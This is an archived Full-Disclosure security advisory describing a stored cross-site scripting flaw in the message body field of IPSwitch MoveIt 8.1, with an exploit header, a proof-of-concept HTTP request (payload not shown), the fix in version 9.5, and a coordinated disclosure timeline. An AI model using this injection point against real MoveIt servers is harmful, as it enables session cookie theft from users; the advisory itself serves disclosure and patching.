lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 01 Feb 2018 17:54:01 -0700
Subject: [FD] IPSwitch MoveIt Stored Cross Site Scripting (XSS)

# Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting (XSS)
# Date: 1-31-2017
# Software Link:
# Affected Version: 8.1-9.4 (only confirmed on 8.1 but other versions
prior to 9.5 may also be vulnerable)
# Exploit Author: 1N3@...wdShield - (Early
Warning Security)
# Contact:
# Vendor Homepage: 
# Category: Webapps
# Attack Type: Remote
# Impact: Data/Cookie Theft 
IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting
(XSS) vulnerability. Attackers can leverage this vulnerability to send
malicious messages to other users in order to steal session cookies
and launch client-side attacks. 
 Proof of Concept
The vulnerability lies in the Send Message -> Body Text Area input
POST /human.aspx?r=692492538 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 598

Update to version 9.5
 Disclosure Timeline
1/30/2017 - Disclosed details of vulnerability to IPSwitch.
1/31/2017 - IPSwitch confirmed the vulnerability and verified the fix
as of version 9.5 and approved public disclosure of the vulnerability.
View attachment "ipswitch-moveit-stored-xss.txt" of type "text/plain" (2139 bytes)

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists